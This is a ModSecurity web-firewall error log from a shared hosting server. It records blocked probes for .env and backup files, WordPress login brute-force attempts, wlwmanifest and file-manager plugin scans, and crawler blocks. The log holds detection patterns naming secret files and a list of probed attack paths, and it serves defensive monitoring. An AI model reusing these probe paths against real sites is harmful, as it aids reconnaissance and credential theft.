[Tue May 26 14:47:17.687460 2026] [security2:error] [pid 648203:tid 648372] [client 195.178.110.34:38542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/prod/.env"] [unique_id "ahVlHbEQDDtxJNiDrdTPmAAAAKw"]
[Tue May 26 14:47:17.863274 2026] [security2:error] [pid 648203:tid 648391] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlHbEQDDtxJNiDrdTPkAAAAL8"]
[Tue May 26 14:47:18.561443 2026] [security2:error] [pid 648203:tid 648345] [client 185.191.171.11:21596] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVlHrEQDDtxJNiDrdTPugAAAJE"]
[Tue May 26 14:47:18.561582 2026] [security2:error] [pid 648203:tid 648345] [client 185.191.171.11:21596] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVlHrEQDDtxJNiDrdTPugAAAJE"]
[Tue May 26 14:47:18.566979 2026] [security2:error] [pid 648203:tid 648449] [client 65.111.6.188:30855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlHbEQDDtxJNiDrdTPlQAAAPk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:19.274412 2026] [security2:error] [pid 648203:tid 648448] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlHrEQDDtxJNiDrdTPywAAAPg"]
[Tue May 26 14:47:19.756360 2026] [security2:error] [pid 648203:tid 648348] [client 65.111.28.105:33757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.28.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlH7EQDDtxJNiDrdTP4wAAAJQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:21.056343 2026] [security2:error] [pid 648203:tid 648433] [client 209.50.185.253:34367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 253.185.50.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlILEQDDtxJNiDrdTQCQAAAOk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:22.119122 2026] [security2:error] [pid 648203:tid 648373] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlIbEQDDtxJNiDrdTQJwAAAK0"]
[Tue May 26 14:47:22.352337 2026] [core:error] [pid 648203:tid 648347] [client 213.180.203.9:64216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:47:22.352369 2026] [core:error] [pid 648203:tid 648347] [client 213.180.203.9:64216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:47:23.247445 2026] [security2:error] [pid 648203:tid 648348] [client 217.181.90.51:9245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlIrEQDDtxJNiDrdTQMwAAAJQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:24.793356 2026] [security2:error] [pid 648203:tid 648439] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJLEQDDtxJNiDrdTQgQAAAO8"]
[Tue May 26 14:47:25.247736 2026] [security2:error] [pid 648203:tid 648350] [client 45.154.98.38:60005] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJbEQDDtxJNiDrdTQogAAAJY"]
[Tue May 26 14:47:25.486302 2026] [security2:error] [pid 648203:tid 648411] [client 104.207.44.166:29735] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlJLEQDDtxJNiDrdTQfQAAANM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:25.564212 2026] [security2:error] [pid 648203:tid 648443] [client 114.119.155.83:22895] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVlJbEQDDtxJNiDrdTQsAAAAPM"], referer: http://glorodavionics.com/index.php?route=product%2Fproduct&path=72_84_116&product_id=120
[Tue May 26 14:47:26.125815 2026] [security2:error] [pid 648203:tid 648430] [client 45.154.98.38:60553] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJrEQDDtxJNiDrdTQyAAAAOY"]
[Tue May 26 14:47:26.292219 2026] [security2:error] [pid 648203:tid 648375] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJbEQDDtxJNiDrdTQugAAAK8"]
[Tue May 26 14:47:26.706834 2026] [security2:error] [pid 648203:tid 648372] [client 45.154.98.38:61091] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJrEQDDtxJNiDrdTQ3wAAAKw"]
[Tue May 26 14:47:26.748394 2026] [security2:error] [pid 648203:tid 648440] [client 209.50.166.19:49707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.166.50.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlJrEQDDtxJNiDrdTQ1AAAAPA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:27.284453 2026] [security2:error] [pid 648203:tid 648431] [client 45.154.98.38:61501] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJ7EQDDtxJNiDrdTQ9gAAAOc"]
[Tue May 26 14:47:27.490943 2026] [security2:error] [pid 648203:tid 648364] [client 195.178.110.34:52958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahVlJ7EQDDtxJNiDrdTQ-gAAAKQ"]
[Tue May 26 14:47:27.601282 2026] [security2:error] [pid 648203:tid 648429] [client 146.174.163.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJ7EQDDtxJNiDrdTQ7wAAAOU"]
[Tue May 26 14:47:27.884470 2026] [security2:error] [pid 648203:tid 648438] [client 45.154.98.38:61851] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJ7EQDDtxJNiDrdTRCAAAAO4"]
[Tue May 26 14:47:28.222218 2026] [security2:error] [pid 648203:tid 648400] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJ7EQDDtxJNiDrdTRBQAAAMg"]
[Tue May 26 14:47:28.502539 2026] [security2:error] [pid 648203:tid 648363] [client 45.154.98.38:62237] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKLEQDDtxJNiDrdTRGgAAAKM"]
[Tue May 26 14:47:28.890908 2026] [security2:error] [pid 648203:tid 648380] [client 65.111.2.205:58009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlJ7EQDDtxJNiDrdTRAgAAALQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:29.079528 2026] [security2:error] [pid 648203:tid 648366] [client 45.154.98.38:62589] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKbEQDDtxJNiDrdTRJgAAAKY"]
[Tue May 26 14:47:29.594079 2026] [security2:error] [pid 648203:tid 648430] [client 114.119.156.227:24719] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/82q1r8jx/tv-telma-vo-zivo-mobile"] [unique_id "ahVlKbEQDDtxJNiDrdTRMAAAAOY"], referer: https://obinnawrites.com/82q1r8jx/tv-telma-vo-zivo-mobile
[Tue May 26 14:47:29.667240 2026] [security2:error] [pid 648203:tid 648456] [client 45.154.98.38:62952] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKbEQDDtxJNiDrdTRMQAAAQA"]
[Tue May 26 14:47:30.171793 2026] [security2:error] [pid 648203:tid 648406] [client 45.3.52.80:64355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.52.3.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlKbEQDDtxJNiDrdTRQQAAAM4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:30.268644 2026] [security2:error] [pid 648203:tid 648439] [client 45.154.98.38:63256] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKrEQDDtxJNiDrdTRRgAAAO8"]
[Tue May 26 14:47:30.857916 2026] [security2:error] [pid 648203:tid 648351] [client 45.154.98.38:63656] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKrEQDDtxJNiDrdTRWQAAAJc"]
[Tue May 26 14:47:31.042730 2026] [security2:error] [pid 648203:tid 648363] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlKrEQDDtxJNiDrdTRWAAAAKM"]
[Tue May 26 14:47:31.468912 2026] [security2:error] [pid 648203:tid 648336] [client 45.154.98.38:64098] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVlK7EQDDtxJNiDrdTRagAAAIg"]
[Tue May 26 14:47:32.056911 2026] [security2:error] [pid 648203:tid 648455] [client 45.154.98.38:64571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVlLLEQDDtxJNiDrdTRgAAAAP8"]
[Tue May 26 14:47:32.372667 2026] [security2:error] [pid 648203:tid 648425] [client 209.50.165.17:53245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlK7EQDDtxJNiDrdTRYwAAAOE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:33.198705 2026] [security2:error] [pid 648203:tid 648224] [remote 154.66.198.148:30676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVlLbEQDDtxJNiDrdTRpgAAwRQ"]
[Tue May 26 14:47:33.444036 2026] [security2:error] [pid 648203:tid 648404] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlLLEQDDtxJNiDrdTRoQAAAMw"]
[Tue May 26 14:47:34.461177 2026] [security2:error] [pid 648203:tid 648431] [client 65.111.27.75:13593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlLbEQDDtxJNiDrdTRtgAAAOc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:35.749145 2026] [security2:error] [pid 648203:tid 648335] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlL7EQDDtxJNiDrdTR_QAAAIc"]
[Tue May 26 14:47:36.527802 2026] [security2:error] [pid 648203:tid 648345] [client 45.3.32.231:43011] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlL7EQDDtxJNiDrdTSAQAAAJE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:37.917906 2026] [security2:error] [pid 648203:tid 648450] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlMbEQDDtxJNiDrdTSWQAAAPo"]
[Tue May 26 14:47:38.562239 2026] [security2:error] [pid 648203:tid 648358] [client 209.50.181.226:17483] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlMbEQDDtxJNiDrdTSWgAAAJ4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:38.781692 2026] [security2:error] [pid 648203:tid 648290] [remote 54.38.29.86:60256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVlMrEQDDtxJNiDrdTSewAA3lY"]
[Tue May 26 14:47:39.639958 2026] [security2:error] [pid 648203:tid 648372] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlM7EQDDtxJNiDrdTSkgAAAKw"]
[Tue May 26 14:47:40.764959 2026] [security2:error] [pid 648203:tid 648389] [client 65.111.12.76:50497] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlM7EQDDtxJNiDrdTSnAAAAL0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:42.569056 2026] [security2:error] [pid 648203:tid 648419] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlNrEQDDtxJNiDrdTS6AAAANs"]
[Tue May 26 14:47:42.834105 2026] [security2:error] [pid 648203:tid 648441] [client 216.26.252.154:17969] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlNbEQDDtxJNiDrdTS1AAAAPE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:44.082286 2026] [security2:error] [pid 648203:tid 648383] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlN7EQDDtxJNiDrdTTEwAAALc"]
[Tue May 26 14:47:45.038103 2026] [security2:error] [pid 648203:tid 648416] [client 65.111.20.246:13037] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlN7EQDDtxJNiDrdTTGwAAANg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:46.272193 2026] [security2:error] [pid 648203:tid 648439] [client 65.111.0.69:42709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.0.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlOrEQDDtxJNiDrdTTYwAAAO8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:47.366535 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlOrEQDDtxJNiDrdTTeQAAAM4"]
[Tue May 26 14:47:48.050539 2026] [security2:error] [pid 648203:tid 648347] [client 4.201.75.230:28837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmgAAAJM"]
[Tue May 26 14:47:48.050690 2026] [security2:error] [pid 648203:tid 648347] [client 4.201.75.230:28837] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmgAAAJM"]
[Tue May 26 14:47:48.126181 2026] [security2:error] [pid 648203:tid 648368] [client 4.201.75.230:28805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmwAAAKg"]
[Tue May 26 14:47:48.126324 2026] [security2:error] [pid 648203:tid 648368] [client 4.201.75.230:28805] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmwAAAKg"]
[Tue May 26 14:47:48.206166 2026] [security2:error] [pid 648203:tid 648205] [remote 124.156.212.23:54849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmAAA-QE"]
[Tue May 26 14:47:48.420565 2026] [security2:error] [pid 648203:tid 648386] [client 20.12.194.227:32058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.haddingtonwines.freshmindsolutions.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTogAAALo"]
[Tue May 26 14:47:48.420740 2026] [security2:error] [pid 648203:tid 648386] [client 20.12.194.227:32058] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.haddingtonwines.freshmindsolutions.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTogAAALo"]
[Tue May 26 14:47:48.512177 2026] [security2:error] [pid 648203:tid 648336] [client 216.26.246.107:25337] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlO7EQDDtxJNiDrdTTgwAAAIg"], referer: https://velanstore.ca/wp-login.php
